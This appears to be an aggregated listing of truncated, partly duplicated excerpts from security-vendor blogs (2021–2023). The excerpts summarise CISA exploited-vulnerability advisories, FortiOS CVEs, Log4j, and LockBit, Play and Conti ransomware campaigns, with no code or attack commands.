A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.’s CISA, NSA, and FBI; Canada’s CCCS; U.K.’s NCSC-UK; Australia’s ACSC; and New Zealand’s NCSC-NZ and CERT NZ.
This collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. The realizatio
Qualys
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities
blogs_qualys·2023-08-24
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities
## Table of Contents
References
Additional Contributor
A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.’s CISA, NSA, and FBI; Canada’s CCCS; U.K.’s NCSC-UK; Australia’s ACSC; and New Zealand’s NCSC-NZ and CERT NZ.
This collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. The realization tha
Sentinelone
Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
blogs_sentinelone·2023-08-08·CVSS 9.1
[CRITICAL] Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
Leveraging known bugs and unpatched exploits continue to be an unyielding strategy for threat actors. Ranging from security bypasses and credential exposure to remote code execution, software vulnerabilities remain tools of the trade for cyber attackers looking for a way into lucrative systems.
While new flaws found in Active Directory and the MOVEit file transfer application along with those used in the AlienFox toolkit or recent IceFire ransomware campaigns have wreaked havoc this year, a number of existing vulnerabilities stand out from the rest in terms of how often they are abused to this day.
In this post, we delve into CISA’s latest round-up, which lists the top 12 most routinely exploited vulnerabilities of 2022 that continue to pose significant threats to enterprise businesses.
Sentinelone
Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
blogs_sentinelone·2023-08-08·CVSS 9.1
[CRITICAL] Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
Leveraging known bugs and unpatched exploits continue to be an unyielding strategy for threat actors. Ranging from security bypasses and credential exposure to remote code execution, software vulnerabilities remain tools of the trade for cyber attackers looking for a way into lucrative systems.
While new flaws found in Active Directory and the MOVEit file transfer application along with those used in the AlienFox toolkit or recent IceFire ransomware campaigns have wreaked havoc this year, a number of existing vulnerabilities stand out from the rest in terms of how often they are abused to this day.
In this post, we delve into CISA’s latest round-up, which lists the top 12 most routinely exploited vulnerabilities of 2022 that continue to pose significant threats to enterprise businesses.
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
Meet LockBit: The Most Prevalent Ransomware in 2022 | FortiGuard Labs
blogs_fortinet·2023-07-10
Meet LockBit: The Most Prevalent Ransomware in 2022 | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Meet LockBit: The Most Prevalent Ransomware in 2022
By Shunichi Imano and James Slaughter | July 10, 2023
Affected platforms: Microsoft Windows, Linux, ESXi, MacOS
Impacted parties: Microsoft Windows, Linux, ESXi, and MacOS Users
Impact: Encrypts and exfiltrates victims’ files and demands ransom for file decryption and not to leak stolen files
Severity level: High
On June 14th, 2023, the CISA, FBI, MS-ISAC, and multiple international cyber security organizations released a joint advisory for the LockBit ransomware. This ransomware group has been active since early 2020, targeting organizations across numerous industries, including energy and government sectors. According to the advisory, LockBit was the most active ransomware in 2022.
This blog provides
Fortinet
Analysis of CVE-2023-27997 and Clarifications on Volt Typhoon Campaign | Fortinet Blog
blogs_fortinet·2023-06-12·CVSS 9.8
CVE-2023-27997 [CRITICAL] Analysis of CVE-2023-27997 and Clarifications on Volt Typhoon Campaign | Fortinet Blog
PSIRT BLOGS
Analysis of CVE-2023-27997 and Clarifications on Volt Typhoon Campaign
By Carl Windsor | June 12, 2023
Affected Platforms: FortiOS
Impacted Users: Targeted at government, manufacturing, and critical infrastructure
Impact: Data loss and OS and file corruption
Severity Level: Critical
Today, Fortinet published a CVSS Critical PSIRT Advisory (FG-IR-23-097 / CVE-2023-27997) along with several other SSL-VPN related fixes. This blog adds context to that advisory, providing our customers with additional details to help them make informed, risk-based decisions, and provides our perspective relative to recent events involving malicious actor activity.
The following write-up details our initial investigation into the incident that led to the discovery of this vulnerability and additi
Fortinet
Analysis of FG-IR-22-369 | Fortinet Blog
blogs_fortinet·2023-03-09·CVSS 6.7
CVE-2022-41328 [MEDIUM] Analysis of FG-IR-22-369 | Fortinet Blog
PSIRT BLOGS
Analysis of FG-IR-22-369
By Guillaume Lovet and Alex Kong | March 09, 2023
Affected Platforms: FortiOS
Impacted Users: Government & large organizations
Impact: Data loss and OS and file corruption
Severity Level: High
Fortinet published a CVSS Medium PSIRT Advisory (FG-IR-22-369 / CVE-2022-41328) on March 7th, 2023. The following write-up details our initial investigation into the incident that led to the discovery of this vulnerability and additional IoCs identified during our ongoing analysis.
Executive Summary
Multiple IoCs have been uncovered related to the incident FG-IR-22-369 / CVE-2022-41328.
The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets.
Incident Analysis
Fortinet’s investigat
Fortinet
Analysis of FG-IR-22-398 – FortiOS - heap-based buffer overflow in SSLVPNd | Fortinet Blog
blogs_fortinet·2023-01-11·CVSS 9.8
CVE-2022-42475 [CRITICAL] Analysis of FG-IR-22-398 – FortiOS - heap-based buffer overflow in SSLVPNd | Fortinet Blog
PSIRT BLOGS
Analysis of FG-IR-22-398 – FortiOS - heap-based buffer overflow in SSLVPNd
By Carl Windsor, Guillaume Lovet, Hongkei Chan, and Alex Kong | January 11, 2023
Affected Platforms: FortiOS
Impacted Users: Government & large organizations
Impact: Data loss and OS and file corruption
Severity Level: High
Fortinet has published CVSS: Critical advisory FG-IR-22-398 / CVE-2022-42475 on Dec 12, 2022. The following writeup details our initial investigation into this malware and additional IoCs identified during our ongoing analysis.
Executive Summary
Multiple additional IoCs have been uncovered related to the incident FG-IR-22-398 / CVE-2022-42475
The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets.
Incid
Sentinelone
Avaddon
blogs_sentinelone·2022-11-30
Avaddon
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Sentinelone
REvil
blogs_sentinelone·2022-11-30
REvil
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Trendmicro
Lücken in der Sicherheit von Heimarbeitsplätzen
blogs_trendmicro·2022-10-19
Lücken in der Sicherheit von Heimarbeitsplätzen
Malware
## Lücken in der Sicherheit von Heimarbeitsplätzen
Remote- und hybride Arbeitsplätze sind mittlerweile die Norm. Wir haben die Risiken und Bedrohungen dafür analysiert und geben Unternehmen ausführliche Empfehlungen, wie sie diese verteilten Arbeitspools sichern können.
By: Trend Micro Oct 19, 2022 Read time: ( words)
Save to Folio
Mittlerweile kehren Unternehmen entweder zur Arbeit im Büro zurück, stellen dauerhaft auf Fernarbeit um oder entscheiden sich für eine Kombination aus beidem. Jede dieser Lösungen hat ihre Vor- und Nachteile, doch aus Sicht der Cybersicherheit bringen die beiden letztgenannten einige Herausforderungen mit und lenken den Blick auf Sicherheitslücken.
Im Fall der hybriden und Heimarbeitsplätze (Work-From-Home, WFH) genießen Mitarbeiter nicht mehr den
Fortinet
Update Regarding CVE-2022-40684 | Fortinet Blog
blogs_fortinet·2022-10-14·CVSS 9.8
CVE-2022-40684 [CRITICAL] Update Regarding CVE-2022-40684 | Fortinet Blog
PSIRT BLOGS
Update Regarding CVE-2022-40684
By Carl Windsor | October 14, 2022
Fortinet recently distributed a PSIRT Advisory regarding CVE-2022-40684 that details urgent mitigation guidance, including upgrades as well as workarounds for customers and recommended next steps. The following update and considerations are part of our efforts to communicate the availability of patches and mitigations to address CVE-2022-40684 and also strongly urge potentially affected customers to immediately update their FortiOS, FortiProxy, and FortiSwitchManager products.
Timely and ongoing communications with our customers is a key component in our efforts to best protect their organization. Customer communications often detail the most up-to-date guidance and recommended next steps.
In this case, we w
Tenable
AA22-257A: Cybersecurity Agencies Issue Joint Advisory on Iranian Islamic Revolutionary Guard Corps-Affiliated Attacks
blogs_tenable·2022-09-15
AA22-257A: Cybersecurity Agencies Issue Joint Advisory on Iranian Islamic Revolutionary Guard Corps-Affiliated Attacks
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
blogs_trendmicro·2022-09-06
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
Ransomware
## Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa
Play is a new ransomware that takes a page out of Hive and Nokoyawa's playbook. The many similarities among them indicate that Play, like Nokoyawa, are operated by the same people.
By: Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares 2022/09/06 Read time: ( words)
Save to Folio
In July, we investigated a spate of ransomware cases in the Latin American region that targeted government entitles, which was initially attributed to a new player known as Play ransomware. This ransomware’s name was derived from its behavior, as it adds the extension “.play” after encrypting files. Its ransom note also contains the single word, “PL
Trendmicro
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
blogs_trendmicro·2022-09-06
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
Ransomware
# Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa
Play is a new ransomware that takes a page out of Hive and Nokoyawa's playbook. The many similarities among them indicate that Play, like Nokoyawa, are operated by the same people.
By: Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares
Sep 06, 2022
Read time: ( words)
Save to Folio
In July, we investigated a spate of ransomware cases in the Latin American region that targeted government entitles, which was initially attributed to a new player known as Play ransomware. This ransomware’s name was derived from its behavior, as it adds the extension “.play” after encrypting files. Its ransom note also contains the single word, “
Trendmicro
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
blogs_trendmicro·2022-09-06
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
Ransomware
## Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa
Play is a new ransomware that takes a page out of Hive and Nokoyawa's playbook. The many similarities among them indicate that Play, like Nokoyawa, are operated by the same people.
By: Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares Sep 06, 2022 Read time: ( words)
Save to Folio
In July, we investigated a spate of ransomware cases in the Latin American region that targeted government entitles, which was initially attributed to a new player known as Play ransomware. This ransomware’s name was derived from its behavior, as it adds the extension “.play” after encrypting files. Its ransom note also contains the single word, “
Trendmicro
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
blogs_trendmicro·2022-09-06
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
Ransomware
# Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa
Play is a new ransomware that takes a page out of Hive and Nokoyawa's playbook. The many similarities among them indicate that Play, like Nokoyawa, are operated by the same people.
By: Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares
2022/09/06
Read time: ( words)
Save to Folio
In July, we investigated a spate of ransomware cases in the Latin American region that targeted government entitles, which was initially attributed to a new player known as Play ransomware. This ransomware’s name was derived from its behavior, as it adds the extension “.play” after encrypting files. Its ransom note also contains the single word, “PL
Qualys
CISA Alert: Top 15 Routinely Exploited Vulnerabilities
blogs_qualys·2022-05-06·CVSS 10.0
[CRITICAL] CISA Alert: Top 15 Routinely Exploited Vulnerabilities
## Table of Contents
CISAs Top 15 Routinely Exploited Vulnerabilities of 2021
Highlights of Top Vulnerabilities Cited in CISA 2021 Report
Log4Shell Vulnerability
ProxyShell: Multiple Vulnerabilities
ProxyLogon: Multiple Vulnerabilities
How Can Qualys Help?
Getting Started
The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report’s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment.
The Cybersecurity & Infrastructure Security Agency (CISA) releases detailed alerts of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights in
Qualys
CISA Alert: Top 15 Routinely Exploited Vulnerabilities | Qualys
blogs_qualys·2022-05-06
CISA Alert: Top 15 Routinely Exploited Vulnerabilities | Qualys
#### Table of Contents
- CISAs Top 15 Routinely Exploited Vulnerabilities of 2021
- Highlights of Top Vulnerabilities Cited in CISA 2021 Report
- Log4Shell Vulnerability
- ProxyShell: Multiple Vulnerabilities
- ProxyLogon: Multiple Vulnerabilities
- How Can Qualys Help?
- Getting Started
The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report’s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment.
The Cybersecurity & Infrastructure Security Agency (CISA) releases detailed alerts of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical i
Sentinelone
Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
blogs_sentinelone·2022-04-28·CVSS 9.8
[CRITICAL] Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
From remote code execution and privilege escalation to security bypasses and path traversal, software vulnerabilities are a threat actor’s stock-in-trade for initial access and compromise. In the past 12 months, we’ve seen a number of new flaws, including Log4Shell, ProxyShell, and ProxyLogon, being exploited in attacks against enterprises. These and other known bugs, some revealed as far back as 2017, continue to be routinely abused in environments where organizations have failed to properly inventory and patch. As CISA released its latest update on the most commonly exploited vulnerabilities, we take a look at each of the top 15 most routinely exploited bugs being used against businesses today.
## 1. Log4Shell (CVE-2021-44228)
Occupying top spot is the notorious flaw in the Apache Java
Sentinelone
Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
blogs_sentinelone·2022-04-28·CVSS 9.8
[CRITICAL] Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
From remote code execution and privilege escalation to security bypasses and path traversal, software vulnerabilities are a threat actor’s stock-in-trade for initial access and compromise. In the past 12 months, we’ve seen a number of new flaws, including Log4Shell, ProxyShell, and ProxyLogon, being exploited in attacks against enterprises. These and other known bugs, some revealed as far back as 2017, continue to be routinely abused in environments where organizations have failed to properly inventory and patch. As CISA released its latest update on the most commonly exploited vulnerabilities, we take a look at each of the top 15 most routinely exploited bugs being used against businesses today .
## 1. Log4Shell (CVE-2021-44228)
Occupying top spot is the notorious flaw in the Apache Jav
Tenable
ContiLeaks: Chats Reveal Over 30 Vulnerabilities Used by Conti Ransomware – How Tenable Can Help
blogs_tenable·2022-03-24
ContiLeaks: Chats Reveal Over 30 Vulnerabilities Used by Conti Ransomware – How Tenable Can Help
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines
blogs_qualys·2022-02-26
Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines
## Table of Contents
Protecting Customer Data on Qualys Cloud Platform
Urgent: Assess and Heighten Your Security Posture
Step 1: Monitor Your Shodan/Internet Exposed Assets
Step 2: Detect, Prioritize and Remediate CISAs Catalog ofKnown Exploited Vulnerabilities
Step 3: Protect Your Cloud Services and Office 365
Step 4: Continuously Detect any Potential Threats and Attacks
Take Action to Learn More about How to Strengthen Your Defenses
CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA’s recommendations.
With the invasion of Ukraine by Russia, the U.
Tenable
Government Advisories Warn of APT Activity Resulting from Russian Invasion of Ukraine
blogs_tenable·2022-02-24
Government Advisories Warn of APT Activity Resulting from Russian Invasion of Ukraine
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Unit42
Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
blogs_unit42·2022-02-22
Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
Threat Research Center
Threat Research
Malware
## Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
Unit 42
Published: February 22, 2022
Malware
Threat Research
DDoS
Defacement
Gamaredon
HermeticWiper
Nation-state
Russia
Trident Ursa
Ukraine
WhisperGate
## Executive Summary
Over the past several weeks, Russia-Ukraine cyber activity has escalated substantially. Beginning on Feb. 15, a series of distributed denial of service (DDoS) attacks commenced. These attacks have continued over the past week, impacting both the Ukrainian government and banking institutions. On Feb. 23, a new variant of wiper malware named HermeticWiper was discovered in Ukraine. Shortl
Unit42
Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
blogs_unit42·2022-02-22
Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
## Executive Summary
Over the past several weeks, Russia-Ukraine cyber activity has escalated substantially. Beginning on Feb. 15, a series of distributed denial of service (DDoS) attacks commenced. These attacks have continued over the past week, impacting both the Ukrainian government and banking institutions. On Feb. 23, a new variant of wiper malware named HermeticWiper was discovered in Ukraine. Shortly after, a new round of website defacement attacks were also observed impacting Ukrainian government organizations.
Consistent with our previous reporting on the topic, several western governments have issued recommendations for their populations to prepare for cyberattacks that could disrupt, disable or destroy critical infrastructure. We have already observed an increase in Russian c
Checkpoint
21st February– Threat Intelligence Report
blogs_checkpoint·2022-02-21·CVSS 9.8
CVE-2018-13379 [CRITICAL] 21st February– Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 21st February– Threat Intelligence Report
For the latest discoveries in cyber research for the week of 21st February, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research has investigated the attack against Iranian broadcasting that occurred in late January. CPR was able to discover part of the tools that were utilized in this operation, including the evidence of the usage of a destructive wiper malware.
Check Point Research has discovered a new implementation of the
Sentinelone
Log4j2 In The Wild | Iranian-Aligned Threat Actor “TunnelVision” Actively Exploiting VMware Horizon
blogs_sentinelone·2022-02-17·CVSS 9.1
[CRITICAL] Log4j2 In The Wild | Iranian-Aligned Threat Actor “TunnelVision” Actively Exploiting VMware Horizon
## Log4j2 In The Wild | Iranian-Aligned Threat Actor “TunnelVision” Actively Exploiting VMware Horizon
By Amitai Ben Shushan Ehrlich and Yair Rigevsky
## Executive Summary
SentinelLabs has been tracking the activity of an Iranian-aligned threat actor operating in the Middle-East and the US.
Due to the threat actor’s heavy reliance on tunneling tools, as well as the unique way it chooses to widely deploy those, we track this cluster of activity as TunnelVision.
Much like other Iranian threat actors operating in the region lately, TunnelVision’s activities were linked to deployment of ransomware, making the group a potentially destructive actor.
## Overview
TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions. During the time we’ve
Sentinelone
Log4j2 In The Wild | Iranian-Aligned Threat Actor "TunnelVision" Actively Exploiting VMware Horizon
blogs_sentinelone·2022-02-17·CVSS 9.1
[CRITICAL] Log4j2 In The Wild | Iranian-Aligned Threat Actor "TunnelVision" Actively Exploiting VMware Horizon
By Amitai Ben Shushan Ehrlich and Yair Rigevsky
## Executive Summary
- SentinelLabs has been tracking the activity of an Iranian-aligned threat actor operating in the Middle-East and the US.
- Due to the threat actor’s heavy reliance on tunneling tools, as well as the unique way it chooses to widely deploy those, we track this cluster of activity as TunnelVision.
- Much like other Iranian threat actors operating in the region lately, TunnelVision’s activities were linked to deployment of ransomware, making the group a potentially destructive actor.
## Overview
TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions. During the time we’ve been tracking this actor, we have observed wide exploitation of Fortinet FortiOS (CVE-2018-13379), M
Trendmicro
LockBit im Rampenlicht
blogs_trendmicro·2022-01-09
LockBit im Rampenlicht
## LockBit im Rampenlicht
LockBit ist eine der aktivsten Ransomware mit leistungsstarke Malware-Funktionen und einem mächtigen Partnerprogramm. Für Unternehmen ist es daher zu empfehlen, die Taktiken, Techniken und Verfahren (TTPs) von LockBit zu kennen.
By: Trend Micro Research Jan 09, 2022 Read time: ( words)
Save to Folio
Originalartikel von Trend Micro Research
LockBit trat erstmals im September 2019 als ABCD-Ransomware in Erscheinung und wurde zu einer der heute am weitesten verbreiteten Ransomware-Familien weiterentwickelt. Durch ihren professionellen Geschäftsbetrieb und ihr starkes Partnerprogramm haben die Betreiber von LockBit bewiesen, dass sie langfristig an der Sache dran sind. Die Kenntnis ihrer Taktiken hilft Unternehmen dabei, ihre Abwehr gegen aktuelle und künftige Ra
Fortinet
Apache Log4j Vulnerability | Fortinet Blog
blogs_fortinet·2021-12-12
Apache Log4j Vulnerability | Fortinet Blog
PSIRT BLOGS
Apache Log4j Vulnerability
By Carl Windsor | December 12, 2021
Apache Log4j Vulnerability Defined
Apache Log4j is a Java-based logging audit framework and Apache Log4j2 1.14.1 and below are susceptible to a remote code execution vulnerability where an attacker can leverage this vulnerability to take full control of a machine.
This module is a prerequisite for other software which means it can be found in many products and is trivial to exploit. It is critical that organizations take immediate action to inventory their systems and prioritize remediation.
Impacted Versions
Apache Log4j 2.x <= 2.15.0-rc1
CVSS: 10 (CRITICAL)
Apache Log4j Vulnerability Overview
Until a few days ago, most people would not have had any knowledge of the Log4j2 software. However, this little-know
Trendmicro
Conti-Ransomware im Rampenlicht
blogs_trendmicro·2021-12-07
Conti-Ransomware im Rampenlicht
## Conti-Ransomware im Rampenlicht
Weil Conti zu den derzeit aktivsten und berüchtigsten Ransomware-Familien gehört, sollten Unternehmen wissen, wie und mit welchen Mittel die Angriffe ablaufen. Wir haben die Einzelheiten und auch ausführliche Gegenmaßnahmen zusammengestellt.
By: Trend Micro Dec 07, 2021 Read time: ( words)
Save to Folio
Originalbeitrag von Trend Micro Research
Weil Conti zu den derzeit aktivsten und berüchtigsten Ransomware-Familien gehört, sollten Unternehmen wissen, wie und mit welchen Mittel die Angriffe ablaufen. Wir haben die Einzelheiten und auch ausführliche Gegenmaßnahmen zusammengestellt.
Conti gilt als Nachfolger der Ryuk Ransomware und ist eine der derzeit berüchtigsten aktiven Ransomware-Familien, die unter anderem als Ransomware-as-a-Service (RaaS) bei
Securelist
Cyberthreats to financial organizations in 2022
blogs_securelist·2021-11-23
Cyberthreats to financial organizations in 2022
Table of Contents
Analysis of forecasts for 2021
Key events in 2021
Forecasts for 2022
Authors
Dmitry Bestuzhev
Santiago Pontiroli
Fabio Assolini
Seongsu Park
## A look back on the year 2021 and what to expect in 2022
First of all, we are going to analyze the forecasts we made at the end of 2020 and see how accurate they were. Then we will go through the key events of 2021 relating to attacks on financial organizations. Finally, we will make some forecasts about financial attacks in 2022.
## Analysis of forecasts for 2021
The COVID-19 pandemic is likely to cause a massive wave of poverty, and that invariably translates into more people resorting to crime, including cybercrime. We might see certain economies crashing and local currencies plummeting, which would make Bitcoin thef
Checkpoint
22nd November – Threat Intelligence Report
blogs_checkpoint·2021-11-22·CVSS 9.8
CVE-2018-13379 [CRITICAL] 22nd November – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 22nd November – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 22nd November, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Emotet, the most popular and notorious botnet before its takedown ten months ago, is back . Emotet is currently distributed via TrickBot and already launched a worldwide email spam campaign delivering malicious documents. Researchers believe that Conti ransomware gang is behind the botnet’s return.
Check Point Threat E
Tenable
CISA’s Binding Operational Directive on Managing Unacceptable Risk Vulnerabilities in Federal Enterprises Is Key to Stopping Federal Cyberattacks
blogs_tenable·2021-11-03
CISA’s Binding Operational Directive on Managing Unacceptable Risk Vulnerabilities in Federal Enterprises Is Key to Stopping Federal Cyberattacks
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
Fortinet and Expiring Let’s Encrypt Certificates
blogs_fortinet·2021-09-30
Fortinet and Expiring Let’s Encrypt Certificates
PSIRT BLOGS
Fortinet and Expiring Let’s Encrypt Certificates
By Carl Windsor | September 30, 2021
Fortinet was made aware by customers in the early hours of September 30th that TLS connections to web sites using Let’s Encrypt certificates were failing. Our first response was to validate the certificate chain. We discovered that the root CA for Let’s Trust certificates, IdenTrust DST Root CA X3, had expired at 00:00 UTC on September 30th.
